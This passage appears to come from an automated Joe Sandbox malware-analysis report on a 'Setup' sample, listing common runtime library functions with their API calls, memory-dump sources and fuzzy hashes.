                                                              Download Yara Rule
                                                              APIs
                                                              • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00034F98,?,?,00000000,00000000,00000000,?,00033A5D,00000001,00000214,?,00032FA5), ref: 000361F1
                                                                • Part of subcall function 000347E5: __getptd_noexit.LIBCMT ref: 000347E5
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3249976406.0000000000031000.00000020.00000001.01000000.00000009.sdmp, Offset: 00030000, based on PE: true
                                                              • Associated: 00000004.00000002.3249837396.0000000000030000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.3251530207.0000000000038000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.3252634934.000000000003A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_30000_Setup.jbxd
                                                              Similarity
                                                              • API ID: AllocateHeap__getptd_noexit
                                                              • String ID:
                                                              • API String ID: 328603210-0
                                                              • Opcode ID: 41d0e8c3c05c44a8724e78fdd288aba7ce6dceacf208de63d319226d3ad1b618
                                                              • Instruction ID: f84bdeeb379a03fe57e1d85c2c9bd2f0e65c5db9cb271fab4d18433f36db73bb
                                                              • Opcode Fuzzy Hash: 41d0e8c3c05c44a8724e78fdd288aba7ce6dceacf208de63d319226d3ad1b618
                                                              • Instruction Fuzzy Hash: 0C01D8353016156BEBAB9F64DC14BAB3BDCAF81760F058A29EC16CB1D0DB76D800C750
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 6C923B22 Relevance: 1.6, APIs: 1, Instructions: 51COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • __EH_prolog3.LIBCMT ref: 6C923B29
                                                                • Part of subcall function 6C9678C8: RaiseException.KERNEL32(C000008C,00000001,00000000,00000000,6C95139B,?,00000010,6C925A14,?,?,?,0000004C,6C95B498,?,?,?), ref: 6C9678D3
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: ExceptionH_prolog3Raise
                                                              • String ID:
                                                              • API String ID: 741760457-0
                                                              • Opcode ID: babea73a03da05e1e5e4fbc0c29cac487ab489a62e4195fde1a3f813986de92a
                                                              • Instruction ID: 55b096d985dd591f4985e1bb1774a0bd7d55dd089a13179ca65b67c8b6deb86e
                                                              • Opcode Fuzzy Hash: babea73a03da05e1e5e4fbc0c29cac487ab489a62e4195fde1a3f813986de92a
                                                              • Instruction Fuzzy Hash: 40113570B10A06DFDB18CF79C580869B7B4FF69308720C9A9D0599BA24D731E959CB60
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 6C929746 Relevance: 1.6, APIs: 1, Instructions: 51COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • __EH_prolog3.LIBCMT ref: 6C92974D
                                                                • Part of subcall function 6C9678C8: RaiseException.KERNEL32(C000008C,00000001,00000000,00000000,6C95139B,?,00000010,6C925A14,?,?,?,0000004C,6C95B498,?,?,?), ref: 6C9678D3
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: ExceptionH_prolog3Raise
                                                              • String ID:
                                                              • API String ID: 741760457-0
                                                              • Opcode ID: 02a0bd2ce9ab06a69983cb0c1a2f32ba4d66797d08bd596de470268f90d5e671
                                                              • Instruction ID: 7d15e216af9cfbd98d366bf32f30ebc93f1f91fdc37ba1241e794288bc9dd6ce
                                                              • Opcode Fuzzy Hash: 02a0bd2ce9ab06a69983cb0c1a2f32ba4d66797d08bd596de470268f90d5e671
                                                              • Instruction Fuzzy Hash: 80115B70B01A06DFD708DF69C480899B7F4FFA4708725C9A9D0998BB20D731E956CB90
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 6C926083 Relevance: 1.5, APIs: 1, Instructions: 49COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: H_prolog3_catch
                                                              • String ID:
                                                              • API String ID: 3886170330-0
                                                              • Opcode ID: cb10ce9d203d8845025bedbe5157d920dfdab03af514b58c37b7751f38b46d6e
                                                              • Instruction ID: 6014f80eca2cef2230fff530fbea32a999f758f70d3bb3ef97883d658b42569f
                                                              • Opcode Fuzzy Hash: cb10ce9d203d8845025bedbe5157d920dfdab03af514b58c37b7751f38b46d6e
                                                              • Instruction Fuzzy Hash: 3F11AD7615090ACFCB21CFA6C48098FF3B5BFA4318B214659D0A5D7E94CB34F58ADBA1
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 6C91BE52 Relevance: 1.5, APIs: 1, Instructions: 48COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: H_prolog3
                                                              • String ID:
                                                              • API String ID: 431132790-0
                                                              • Opcode ID: 4d8f2ef6dabce137de04b91bcc2c8d1c4e5205d963a24a7406cc2a2206d514d0
                                                              • Instruction ID: 3b7a46a50a7191802fb7a0bc2688ffcfb7e1214b3c878e55ca31ade79dbcfb73
                                                              • Opcode Fuzzy Hash: 4d8f2ef6dabce137de04b91bcc2c8d1c4e5205d963a24a7406cc2a2206d514d0
                                                              • Instruction Fuzzy Hash: D6115EB0A05218EFCB00DFA8C88599DBBB9AF18714B20C559F519DBB54C730DA05CBE0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 6C968C9E Relevance: 1.5, APIs: 1, Instructions: 46COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: _memcpy_s
                                                              • String ID:
                                                              • API String ID: 2001391462-0
                                                              • Opcode ID: 418c8faa8bb17f4116f65aeaec1898627a1780b09b30d3fe84bd4296820e32b2
                                                              • Instruction ID: 7f310ef706b6010c62ab9bfdd873c6f3e8508804fb2d6cf52ae97a02749ccd57
                                                              • Opcode Fuzzy Hash: 418c8faa8bb17f4116f65aeaec1898627a1780b09b30d3fe84bd4296820e32b2
                                                              • Instruction Fuzzy Hash: 8D017C76200204AFD710DF99C884C9AB7F9FF99354711456AF915CB750D770ED04CBA0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 6C91BF68 Relevance: 1.5, APIs: 1, Instructions: 46COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: H_prolog3
                                                              • String ID:
                                                              • API String ID: 431132790-0
                                                              • Opcode ID: 7068a6b87ade7b99610c3dba9bab7fbf48d5a41ae48da4a9ff838282b8254959
                                                              • Instruction ID: c374479f89da7565dc71775c44a52655b11471b362405a8c3b1900f0793ca881
                                                              • Opcode Fuzzy Hash: 7068a6b87ade7b99610c3dba9bab7fbf48d5a41ae48da4a9ff838282b8254959
                                                              • Instruction Fuzzy Hash: 15116970605209ABDB08EF68C955A9E777ABF55324F208158F829DFBC0CB31EE15CB60
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 6C91A1FF Relevance: 1.5, APIs: 1, Instructions: 34COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: H_prolog3_catch
                                                              • String ID:
                                                              • API String ID: 3886170330-0
                                                              • Opcode ID: 834a7115306312e24cad7a49fd19d208491d4c55780ad566babb64948e27b85a
                                                              • Instruction ID: fc3bf60b9a9bdc2170773cc926fc0d652d1d06012797cf21f59d7be205f19541
                                                              • Opcode Fuzzy Hash: 834a7115306312e24cad7a49fd19d208491d4c55780ad566babb64948e27b85a
                                                              • Instruction Fuzzy Hash: 60F06274B15349EFDB10CF68C905B8D3B65AF59364F208558B818DB790CB71DE15CB60
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 6C91809D Relevance: 1.5, APIs: 1, Instructions: 32fileCOMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              • CreateFileW.KERNEL32(?,?,?,?,00000000,?,00000000,00000001,?,6C91A9FA,?,80000000,00000001,00000003,00000080,00000000), ref: 6C9180D7
                                                                • Part of subcall function 6C9689E2: GetModuleHandleW.KERNEL32(kernel32.dll,?,?,6C9180C1,?,?,?,?,00000000,?,00000001,?,6C91A9FA,?,80000000,00000001), ref: 6C9689F3
                                                                • Part of subcall function 6C9689E2: GetProcAddress.KERNEL32(00000000,CreateFileTransactedW), ref: 6C968A03
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: AddressCreateFileHandleModuleProc
                                                              • String ID:
                                                              • API String ID: 2580138172-0
                                                              • Opcode ID: bc4256c6dfb585e5df72ef7c1cad4f246192c9208edbd3e63d6fbc8393aafed0
                                                              • Instruction ID: 9bc068ced6f561e55402be2364640da2ab76fc0b0b8c1cb6a6e34117c5143272
                                                              • Opcode Fuzzy Hash: bc4256c6dfb585e5df72ef7c1cad4f246192c9208edbd3e63d6fbc8393aafed0
                                                              • Instruction Fuzzy Hash: D0F09D3200410EFBCF165E95DC06DCA3F26EF29364F128212FA24569A0C332D971FB95
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 6C4A7F22 Relevance: 1.5, APIs: 1, Instructions: 32fileCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • CreateFileW.KERNEL32(00002100,00000002,00000000,6C4A7BC3,C0000000,?,00000000,?,?,6C4A7BC3,?,C0000000,00000000,00000002,00002100,?), ref: 6C4A7F5C
                                                                • Part of subcall function 6C4A7E95: GetModuleHandleW.KERNEL32(kernel32.dll,?,?,6C4A7F46,00002100,00000002,00000000,6C4A7BC3,C0000000,?,?,?,6C4A7BC3,?,C0000000,00000000), ref: 6C4A7EA6
                                                                • Part of subcall function 6C4A7E95: GetProcAddress.KERNEL32(00000000,CreateFileTransactedW), ref: 6C4A7EB6
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3303642901.000000006C481000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C480000, based on PE: true
                                                              • Associated: 00000004.00000002.3303606880.000000006C480000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                              • Associated: 00000004.00000002.3303701703.000000006C4BF000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                              • Associated: 00000004.00000002.3303750684.000000006C4C0000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                              • Associated: 00000004.00000002.3303786870.000000006C4C2000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                              • Associated: 00000004.00000002.3303826195.000000006C4C5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c480000_Setup.jbxd
                                                              Similarity
                                                              • API ID: AddressCreateFileHandleModuleProc
                                                              • String ID:
                                                              • API String ID: 2580138172-0
                                                              • Opcode ID: 48462e33ef5dfc7b9dfb37f74dcf1ca7df5264ba29b09c65a7232903818b8397
                                                              • Instruction ID: 2616f7fc4ded7a913d69c2166983403265f90f492ec2a81b1ea91eb2934fe71a
                                                              • Opcode Fuzzy Hash: 48462e33ef5dfc7b9dfb37f74dcf1ca7df5264ba29b09c65a7232903818b8397
                                                              • Instruction Fuzzy Hash: DFF0A43254814ABBCF129FD4DC00ECA7F76AF2D360F108115FA2455A68C332D972EB91
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 6C919E49 Relevance: 1.5, APIs: 1, Instructions: 31COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: H_prolog3_catch
                                                              • String ID:
                                                              • API String ID: 3886170330-0
                                                              • Opcode ID: c60aace957820a154790429e4319fb95c74e65e6a88875086d238cc7dbb6a70d
                                                              • Instruction ID: daf1a813da96922aaa326145640158dc1d3656cb8aa8bccc21cf781b5928bd72
                                                              • Opcode Fuzzy Hash: c60aace957820a154790429e4319fb95c74e65e6a88875086d238cc7dbb6a70d
                                                              • Instruction Fuzzy Hash: 8BF06D30601209EFDB10CF68C905B9D3BA5AF15368F258158B809EF780CB31EE00CBA1
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 6C9453E5 Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: H_prolog3
                                                              • String ID:
                                                              • API String ID: 431132790-0
                                                              • Opcode ID: 6f2903bdc07b29cd62c869f8f4a0a7c7ff1e56d53a5173e2b02d1f0eb36eff03
                                                              • Instruction ID: ef499a06cffab7a530cacf4502e97d9f4a8184bc0395abb54a84b86d1a492456
                                                              • Opcode Fuzzy Hash: 6f2903bdc07b29cd62c869f8f4a0a7c7ff1e56d53a5173e2b02d1f0eb36eff03
                                                              • Instruction Fuzzy Hash: 02F0BE31A011499ACF118BF4C5103ECBB656F3230DF10C05094643BBA1C735E62DD7A0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 6C948CD5 Relevance: 1.5, APIs: 1, Instructions: 27COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              • __EH_prolog3.LIBCMT ref: 6C948CDC
                                                                • Part of subcall function 6C94FFA8: _memcpy_s.LIBCMT ref: 6C94FFCE
                                                                • Part of subcall function 6C94FFA8: _memcpy_s.LIBCMT ref: 6C94FFDE
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: _memcpy_s$H_prolog3
                                                              • String ID:
                                                              • API String ID: 1888667434-0
                                                              • Opcode ID: a0e855cc702f4a3fb89a9f8470895e729f7ed0d8fb16331475af1fb834faedf7
                                                              • Instruction ID: 814171eb408ad303c1526e9cffa1558276fad377ad6640f0618175ddd12afe78
                                                              • Opcode Fuzzy Hash: a0e855cc702f4a3fb89a9f8470895e729f7ed0d8fb16331475af1fb834faedf7
                                                              • Instruction Fuzzy Hash: 9DF0F874A01209AFDF00DFA9C9805DDB7A0BF28718F408456E918EBB40C775DA28CB91
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 6C917C6E Relevance: 1.5, APIs: 1, Instructions: 26COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • __EH_prolog3.LIBCMT ref: 6C917C75
                                                                • Part of subcall function 6C917CE8: __EH_prolog3.LIBCMT ref: 6C917CEF
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: H_prolog3
                                                              • String ID:
                                                              • API String ID: 431132790-0
                                                              • Opcode ID: 193b7ecfcf1dc994a4e500a264a1403b962ae28319cbf739dd52a892f4893f63
                                                              • Instruction ID: 567a1af38e479ffa1cc51b7f17c825ecef5eeabb4ca49304cb80dfd7b38b9ee7
                                                              • Opcode Fuzzy Hash: 193b7ecfcf1dc994a4e500a264a1403b962ae28319cbf739dd52a892f4893f63
                                                              • Instruction Fuzzy Hash: 93F01DB0701A03AAD74CDF3885413E9F6A1BF68308F40463E902DEBB41CB31A828CB94
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 6C948C7A Relevance: 1.5, APIs: 1, Instructions: 25COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              • __EH_prolog3.LIBCMT ref: 6C948C81
                                                                • Part of subcall function 6C94FFA8: _memcpy_s.LIBCMT ref: 6C94FFCE
                                                                • Part of subcall function 6C94FFA8: _memcpy_s.LIBCMT ref: 6C94FFDE
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: _memcpy_s$H_prolog3
                                                              • String ID:
                                                              • API String ID: 1888667434-0
                                                              • Opcode ID: c65892b302773f70c42f1c69b0142ef7ace976f89256613c5ccff907da44c07a
                                                              • Instruction ID: a87422692fa303054fc3d0d6de44f91571396dd082b038a64d0ab326a2fcf0b7
                                                              • Opcode Fuzzy Hash: c65892b302773f70c42f1c69b0142ef7ace976f89256613c5ccff907da44c07a
                                                              • Instruction Fuzzy Hash: 8AF01274A012059BDF10DF99C5405CDBB60BF24718F448455E918AB740C775DA28CB91
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 6C490ECA Relevance: 1.5, APIs: 1, Instructions: 25windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • SendMessageW.USER32(00000000,0000044A,00000002,?), ref: 6C490F06
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3303642901.000000006C481000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C480000, based on PE: true
                                                              • Associated: 00000004.00000002.3303606880.000000006C480000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                              • Associated: 00000004.00000002.3303701703.000000006C4BF000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                              • Associated: 00000004.00000002.3303750684.000000006C4C0000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                              • Associated: 00000004.00000002.3303786870.000000006C4C2000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                              • Associated: 00000004.00000002.3303826195.000000006C4C5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c480000_Setup.jbxd
                                                              Similarity
                                                              • API ID: MessageSend
                                                              • String ID:
                                                              • API String ID: 3850602802-0
                                                              • Opcode ID: 5630b41884fbf5f3e575d27ed605f133e83ca011ec76a5be271c303935813cec
                                                              • Instruction ID: 389ae60b5caf3b79aaa0382f28237b70d29fb83f16ebd822c3d27410ff0d4080
                                                              • Opcode Fuzzy Hash: 5630b41884fbf5f3e575d27ed605f133e83ca011ec76a5be271c303935813cec
                                                              • Instruction Fuzzy Hash: 9BF0C9B690020CBBDB11DF98C846FDEFBF9BB58300F108166E615B7250D77096058B91
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 6C9139AD Relevance: 1.5, APIs: 1, Instructions: 24COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              • __EH_prolog3.LIBCMT ref: 6C9139B4
                                                                • Part of subcall function 6C968DCD: _vwprintf.LIBCMT ref: 6C968E13
                                                                • Part of subcall function 6C968DCD: _vswprintf_s.LIBCMT ref: 6C968E38
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: H_prolog3_vswprintf_s_vwprintf
                                                              • String ID:
